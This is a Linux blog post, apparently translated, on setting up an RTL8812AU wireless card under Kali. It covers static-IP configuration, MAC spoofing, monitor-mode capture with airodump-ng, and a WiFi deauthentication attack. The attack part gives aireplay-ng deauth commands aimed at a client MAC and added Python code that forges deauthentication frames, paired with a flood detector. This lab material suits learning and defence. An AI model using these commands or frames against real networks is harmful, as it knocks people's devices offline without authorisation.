About the author: Linuxer, ex IBMer. GNU https://hmchzb19.github.io/

Category: LINUX

2017-09-25 19:09:41

As in my previous post, I am using an RTL8812AU card. Kali has supported this card since release 2017.1, so it counts as a pretty good little card.

#turn the wireless card's radio on
iwconfig wlan0 txpower on
#list the SSIDs of the wireless networks in range
iwlist wlan0 scan
#connect to a network. Note: iwconfig's "key" sets a WEP key only; for WPA/WPA2 use wpa_supplicant (or the wpa-* lines in /etc/network/interfaces below)
iwconfig wlan0 essid "YOURESSID" key "YOURPASSWORD"
#show the interface's wireless parameters
iwconfig wlan0
#bring the interface down or up (iwconfig has no up/down; use ifconfig or ip link)
ifconfig wlan0 down
ifconfig wlan0 up
#obtain an address via DHCP
dhclient wlan0

#ubuntu/kali: static IP address for the wireless card in /etc/network/interfaces
#---------------------------------------
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
address 192.168.1.11
netmask 255.255.255.0

auto wlan0
iface wlan0 inet static
address 192.168.0.104
netmask 255.255.255.0
gateway 192.168.0.1
#pre-up ip link set wlan0 up
#pre-up iwconfig wlan0 essid ssid
#SSID (comments must be on their own line; ifupdown does not support end-of-line comments)
wpa-ssid 18102XX
#PASSWORD: either the passphrase or the 64-hex PSK printed by wpa_passphrase; keep this file readable by root only, it holds the network secret
wpa-psk PASSWORD
#----------------------------------------------
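The wpa-psk line above can hold either the passphrase or the 256-bit PSK that wpa_supplicant derives from it. The following Python script, added here as an example and not part of the original post or of wpa_supplicant, performs that derivation (PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations, 32-byte output, as IEEE 802.11i specifies and as the wpa_passphrase tool does) and emits a static-IP stanza like the one above with the hex PSK in place of the passphrase. The SSID and passphrase in its main block are the IEEE 802.11i test vector; the addresses are the ones from the stanza above.

```python
import hashlib

# Added example (not the blog's own code): derive the 256-bit WPA/WPA2 PSK
# that wpa_supplicant computes from a passphrase, so /etc/network/interfaces
# can carry the 64-hex PSK instead of the plaintext passphrase.
# Derivation: PBKDF2-HMAC-SHA1, salt = SSID, 4096 iterations, 32 bytes
# (IEEE 802.11i); this is exactly what `wpa_passphrase` prints as psk=.


def wpa2_psk(passphrase: str, ssid: str) -> str:
    """Return the PSK as 64 lowercase hex characters."""
    if not (8 <= len(passphrase) <= 63) or not passphrase.isascii():
        raise ValueError("WPA passphrase must be 8..63 ASCII characters")
    ssid_bytes = ssid.encode("utf-8")
    if not (1 <= len(ssid_bytes) <= 32):
        raise ValueError("SSID must be 1..32 bytes")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid_bytes, 4096, 32).hex()


def interfaces_stanza(iface: str, ssid: str, passphrase: str,
                      address: str, netmask: str, gateway: str) -> str:
    """Static-IP ifupdown stanza like the one in the post, carrying the
    derived hex PSK instead of the passphrase (wpa-psk accepts either form).
    Comments go on their own lines: ifupdown has no end-of-line comments."""
    psk = wpa2_psk(passphrase, ssid)
    return "\n".join([
        f"auto {iface}",
        f"iface {iface} inet static",
        f"address {address}",
        f"netmask {netmask}",
        f"gateway {gateway}",
        "# SSID",
        f"wpa-ssid {ssid}",
        "# 256-bit PSK derived with PBKDF2, not the passphrase itself",
        f"wpa-psk {psk}",
    ]) + "\n"


if __name__ == "__main__":
    # Constructed inputs: the IEEE 802.11i test-vector passphrase and SSID.
    print(interfaces_stanza("wlan0", "IEEE", "password",
                            "192.168.0.104", "255.255.255.0", "192.168.0.1"))
```

The hex PSK is the pairwise master key itself, so it must be protected as carefully as the passphrase; what you gain is that a passphrase possibly reused elsewhere is not written to disk.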


#iwconfig shows or sets the wireless card's parameters
iwconfig
#the interface must be down to change its MAC address
ifconfig wlan1 down

#change MAC address
macchanger --help
#show the current and permanent MAC of the interface
macchanger -s wlan1
#set a fully random MAC (-r); use -e instead to keep the vendor prefix
macchanger --random wlan1

ifconfig wlan1 up

#monitor mode: use airmon-ng. This did not work for me with my RTL8812AU.
airmon-ng start wlan1
#current airmon-ng names the monitor interface wlan1mon; older versions created mon0
airmon-ng stop mon0

#configure monitor mode manually
ifconfig wlan1 down
iwconfig wlan1 mode monitor
ifconfig wlan1 up
#check that Mode:Monitor is shown for wlan1
iwconfig

#kill wpa_supplicant, NetworkManager and other processes that would interfere with monitor mode
airmon-ng check kill
#start sniffing on the wireless LAN (hops across channels, shows every AP in range)
airodump-ng wlan1
#meaning of the columns:
BSSID: MAC address of the AP.
PWR: signal level reported by the card; higher (less negative) means closer. -1 means the driver does not report it.
Beacons: number of beacon frames sent by the AP.
#Data: number of captured data packets (for WEP, unique IVs).
#/s: data packets per second measured over the last 10 seconds.
CH: channel number (taken from the beacons).
MB: maximum speed supported by the AP.
ENC: encryption in use (OPN = none, WEP, WPA, WPA2).
CIPHER: cipher detected (CCMP, TKIP, WEP, ...).
AUTH: authentication protocol (PSK = pre-shared key, MGT = 802.1X/RADIUS).
ESSID: network name (SSID) of the AP.

#write to a file, then analyze it with wireshark.
airodump-ng --channel <channel> --bssid <bssid> --write <file-name> <interface>
eg:
airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write out mon0

#Test wireless device packet injection
aireplay-ng -9 -e 18102XX -a 14:D6:XX:XX:XX:XX wlan1
#my output was:
wlan1 is on channel 7, but the AP uses channel 2
#If you see this, or "No such BSSID available", set wlan1 to the AP's channel first
iwconfig wlan1 channel 2
#verify the current channel
iwlist wlan1 channel
#run the test again; the 100% below means the injection test succeeded
aireplay-ng -9 -e 18102XX -a 14:D6:XX:XX:XX:XX wlan1
18:47:18  Ping (min/avg/max): 2.335ms/3.755ms/10.565ms Power: -40.13
18:47:18  30/30: 100%


#dump my own router; this creates 4 files.
airodump-ng --channel 2 --bssid 14:D6:XX:XX:XX:XX --write out wlan1
#every MAC address listed under STATION is a client associated with this AP (or probing nearby)
#ls out*
out-01.cap  out-01.csv  out-01.kismet.csv  out-01.kismet.netxml
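Once airodump-ng has written out-01.csv, the STATION section is what you use to pick a client for the next step. The following Python script, added here as an example and not part of the original post or of aircrack-ng, parses that CSV (an AP table, a blank line, then the station table, with "(not associated)" for clients that are only probing) and lists the clients per BSSID. The sample CSV inside it is constructed with made-up MAC addresses and ESSIDs in airodump-ng's layout.

```python
# Added example (not the blog's or aircrack-ng's code): parse an airodump-ng
# "out-01.csv" file and map STATION entries to the AP they are associated with.
# Layout: a header line starting "BSSID," followed by AP rows, a blank line,
# then a header starting "Station MAC," followed by client rows.

NOT_ASSOCIATED = "(not associated)"


def parse_airodump_csv(text: str):
    """Return (aps, stations): aps keyed by BSSID, stations as a list of dicts."""
    aps, stations, section = {}, [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("BSSID,"):
            section = "ap"
            continue
        if line.startswith("Station MAC,"):
            section = "sta"
            continue
        if section == "ap":
            f = [p.strip() for p in line.split(",")]
            if len(f) < 15:
                continue
            aps[f[0]] = {
                "channel": int(f[3]), "privacy": f[5], "cipher": f[6],
                "auth": f[7], "power": int(f[8]), "beacons": int(f[9]),
                # ESSID is column 13; an ESSID containing commas spills into
                # the following columns, and the last column (Key) is usually empty
                "essid": ",".join(f[13:-1]).strip(),
            }
        elif section == "sta":
            # Probed ESSIDs (last column) are themselves comma-separated,
            # so split only at the first six commas.
            f = [p.strip() for p in line.split(",", 6)]
            if len(f) < 6:
                continue
            probed = [p.strip() for p in f[6].split(",") if p.strip()] if len(f) > 6 else []
            stations.append({
                "mac": f[0], "power": int(f[3]), "packets": int(f[4]),
                "bssid": None if f[5] == NOT_ASSOCIATED else f[5],
                "probed": probed,
            })
    return aps, stations


def clients_of(stations, bssid: str):
    """MAC addresses of stations associated with the given BSSID, sorted."""
    return sorted(s["mac"] for s in stations if s["bssid"] == bssid)


# Constructed sample in airodump-ng's CSV layout (made-up addresses and ESSIDs).
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2017-09-25 18:47:18, 2017-09-25 18:50:01,  2,  54, WPA2, CCMP, PSK, -40,      120,        0,   0.  0.  0.  0,   5, LabAP, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2017-09-25 18:47:20, 2017-09-25 18:50:00, -50,      300, 00:11:22:33:44:55,
AA:BB:CC:DD:EE:02, 2017-09-25 18:48:02, 2017-09-25 18:49:58, -62,       41, 00:11:22:33:44:55, LabAP
AA:BB:CC:DD:EE:03, 2017-09-25 18:48:30, 2017-09-25 18:48:31, -71,        3, (not associated), HomeNet,CoffeeShop
"""

if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for bssid, ap in aps.items():
        print(f"{bssid} ch{ap['channel']} {ap['privacy']}/{ap['cipher']}/{ap['auth']} {ap['essid']!r}")
        for mac in clients_of(stations, bssid):
            print(f"    client {mac}")
    for s in stations:
        if s["bssid"] is None:
            print(f"unassociated {s['mac']} probing for {s['probed']}")
```

Run it against a real out-01.csv by replacing SAMPLE_CSV with the file's contents; the probed-ESSID list of unassociated stations is also worth keeping, since it names networks those clients will auto-join.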

#Deauthentication attack: theory
This attack disconnects any device from any network within our range, even if the network is protected with a key: on WPA/WPA2 networks without Protected Management Frames, management frames such as deauthentication are sent unauthenticated and in the clear, so anyone who knows the MAC addresses can forge them.
The attacker sends deauthentication frames to the router pretending to be the target machine (by spoofing its MAC address).
At the same time, the attacker sends frames to the target machine (pretending to be the router) telling it that it needs to re-authenticate.
Caveat: where 802.11w Protected Management Frames are required (optional in WPA2, mandatory in WPA3), deauthentication frames are integrity-protected and forged ones are dropped, so this attack does not work against such networks.

#First list the clients connected to the AP (they appear under STATION)
airodump-ng --channel 2 --bssid 14:D6:XX:XX:XX:XX wlan1
#Deauthentication attack: the machine with MAC "00:1E:XX:XX:XX:XX" is kept from staying connected for as long as the frames are sent.
aireplay-ng --deauth [number of deauth packets] -a [AP-MAC] -c [target-MAC] [interface]
#a count of 0 sends deauth frames until interrupted; without -c, broadcast deauth frames hit every client of the AP
aireplay-ng --deauth 100 -a "14:D6:XX:XX:XX:XX" -c "00:1E:XX:XX:XX:XX" wlan1
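To make the two spoofed frames concrete, here is an added Python example (not code from the post or from aircrack-ng) that builds the deauthentication frame each side receives, the one to the client carrying the AP's address as source and the one to the AP carrying the client's address, and then runs a simple detector over a constructed capture: many unprotected deauthentication frames between one address pair is the signature of this attack, while a single frame is ordinary roaming or shutdown. The addresses are made up; radiotap headers and the FCS are omitted, so each frame is the bare 802.11 management frame.

```python
import struct
from collections import Counter

# Added example (not the blog's or aircrack-ng's code): build the two spoofed
# deauthentication frames the attack relies on and detect a flood of them.
# Frame layout follows IEEE 802.11 management frames; radiotap/FCS omitted.

DEAUTH_SUBTYPE = 12   # management (type 0), subtype 12 = Deauthentication
REASON_CLASS3 = 7     # "class 3 frame received from nonassociated STA", aireplay-ng's default


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_deauth(dst: str, src: str, bssid: str,
                 reason: int = REASON_CLASS3, seq: int = 0) -> bytes:
    fc = (DEAUTH_SUBTYPE << 4) | (0 << 2) | 0      # subtype | type | version -> 0xC0
    flags = 0                                       # Protected Frame bit clear: plain, spoofable
    frame = struct.pack("<BBH", fc, flags, 0)       # frame control, flags, duration
    frame += mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)   # addr1 / addr2 / addr3
    frame += struct.pack("<H", (seq & 0xFFF) << 4)  # sequence control (fragment 0)
    frame += struct.pack("<H", reason)              # fixed body: reason code
    return frame


def deauth_burst(ap: str, client: str, rounds: int) -> list:
    """One round = one frame to the client 'from' the AP plus one to the AP 'from' the client."""
    frames = []
    for i in range(rounds):
        frames.append(build_deauth(dst=client, src=ap, bssid=ap, seq=i))
        frames.append(build_deauth(dst=ap, src=client, bssid=ap, seq=i))
    return frames


def parse_frame(frame: bytes) -> dict:
    fc, flags, _duration = struct.unpack_from("<BBH", frame, 0)
    info = {
        "type": (fc >> 2) & 0x3,
        "subtype": fc >> 4,
        "protected": bool(flags & 0x40),   # set when 802.11w (PMF) protects the frame
        "dst": mac_str(frame[4:10]),
        "src": mac_str(frame[10:16]),
        "bssid": mac_str(frame[16:22]),
    }
    if info["type"] == 0 and info["subtype"] == DEAUTH_SUBTYPE and len(frame) >= 26:
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return info


def deauth_flood_pairs(frames, threshold: int = 10) -> dict:
    """Return {(src, dst): count} for unprotected deauth frames seen at least
    `threshold` times. One deauth is normal teardown or roaming; dozens between
    the same pair within one capture is the attack signature."""
    counts = Counter()
    for f in frames:
        p = parse_frame(f)
        if p["type"] == 0 and p["subtype"] == DEAUTH_SUBTYPE and not p["protected"]:
            counts[(p["src"], p["dst"])] += 1
    return {pair: n for pair, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    AP, CLIENT = "00:11:22:33:44:55", "aa:bb:cc:dd:ee:01"   # constructed addresses
    capture = deauth_burst(AP, CLIENT, rounds=64)
    capture.append(build_deauth("aa:bb:cc:dd:ee:02", AP, AP, reason=3))  # one legitimate teardown
    for (src, dst), n in deauth_flood_pairs(capture).items():
        print(f"deauth flood: {src} -> {dst} ({n} frames)")
```

The detector ignores frames with the Protected Frame bit set because under 802.11w a genuine deauthentication is protected and a forged one is discarded by the receiver; an unprotected deauthentication aimed at a station of a PMF-capable BSS is itself suspicious.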
